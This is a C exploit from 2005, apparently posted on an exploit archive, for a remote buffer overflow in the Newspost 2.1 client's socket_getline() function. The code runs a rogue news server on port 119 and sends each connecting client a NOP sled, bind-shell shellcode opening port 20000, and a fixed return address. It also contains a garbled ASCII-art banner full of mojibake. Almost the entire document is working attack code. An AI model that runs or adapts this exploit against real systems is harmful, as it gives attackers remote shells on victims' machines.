Newspost "socket_getline()" Remote Buffer Overflow Exploit Related Advisory - KOTIK/ADV-2005-0092
/*
02/03/2005
NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit
Client Usage
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic
<file>
Greetz fly to my girlfriend YASMIN H.
? 糓
M 糓MM
MMm 糓MMM
M$$MMm 糓MMMM.
MM$$MMMMm MMMMMMMM
`MM$$MMMMMMm 4MMMM$$MM
MMM$$MMMMMMMMm 碝MMM$$MMM
MMM$$$MMMMMMMMm mMMMM$MMMM
`MMM$$$MMMMMMMm MMMM$MMMM? MMMM$$$MMMMMMMm MMM$$MMM? `MMMMMMMMMMMMMm MMMMMMM? `MMMMMMMMMMMMMm MMMMMM
`MMMMMMMMMMMM MMMMM
`MMMMMMMMMM MMMMM
`MMMMMMMMMMMM
MMMMMMMMMMM
mmMMMMMMMMMMMMMMMMM
mmMMMMMMMMMMMMMMMMMMMMMM
糓MM#MMMMMMMMMMMMMMMMMMMMm
4MMM<?>MMMMMMMMMMMMMMMMMMMM
MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMM
糓n 糓MMMMMMMMMMMMMMMMMMMMMMMM 糓nn
nM `MMMMMMMMMMMMMMMMMMMMMM? n? `? MMMMMMMMMMMMMMMMM? n? MMMMMM? mtr?
mMMM nmM mM
mM即 M ' M n
mM$ nM n糓Mn寄
4M m 糓 N ? 糮
m? `n? mM NM? NM
mM mMm nm M醇M募 n糓m 糿 xn? ? 糿 xn? 糓m Mn n? nM
nMm
mM `mMM? nM M nM ,` 糿? y M 糿? y nM ? nM ? ? ? M? M' 寄 M n.,? nm nM nM n M ? ? ? n
MM? mM M nM ? M? n , nM 寄 nM M nM M M M? M
n
MMM? M? nM M哪M n糿N 糓 nM 糓 `糓? 醇 .N nM 糿M? M? n? cybertronic 2oo5
? ________________
----------------------/
MMMMMMMMm mMMMMMMM? 碝M$MMMMMMMMMm mMMMMMMMMM$MM`
MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM
`MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM?
赫湍 just want to say love you dad! 耐蘸
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 119
#define BACKLOG 5
//92 bytes bindcode port 20000
char scode[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h
void cmd ( int connfd );
void header ();
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
header ();
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr )
);
printf ( "[*] Listening..." );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr,
&clilen ) ) < 0 )
{
close ( listenfd );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL,
inet_ntoa ( cliaddr.sin_addr ) );
cmd ( connfd );
}
close ( connfd );
}
}
void
cmd ( int s )
{
char in[1024], out[1200];
unsigned long ret = 0xbfffecb8;
bzero ( &out, 1200 );
memset ( out, 0x90, 956 ); //956
memcpy ( out + 956, scode, sizeof ( scode ) );
strcat ( out, "\x41\x41\x41\x41" );
strncat ( out, ( unsigned char* ) &ret, 4 );
printf ( "[*] Sending Bad Packet [ %u bytes ]...", strlen ( out ) );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
sleep ( 1 );
}
void
header ()
{
system ( "clear" );
printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED "###
" GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# "
YELLOW "###\n" NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "# #
" GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED "###
" GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "# #
" GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "# #
" GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# "
YELLOW "###\n" NORMAL);
printf ( RED " cybertronic@gmx.net\n" NORMAL );
printf ( RED " ----------(c) 2005----------\n\n"
NORMAL );
printf ( "newspost-2.1\n\n" );
}
推荐
评论(0条)
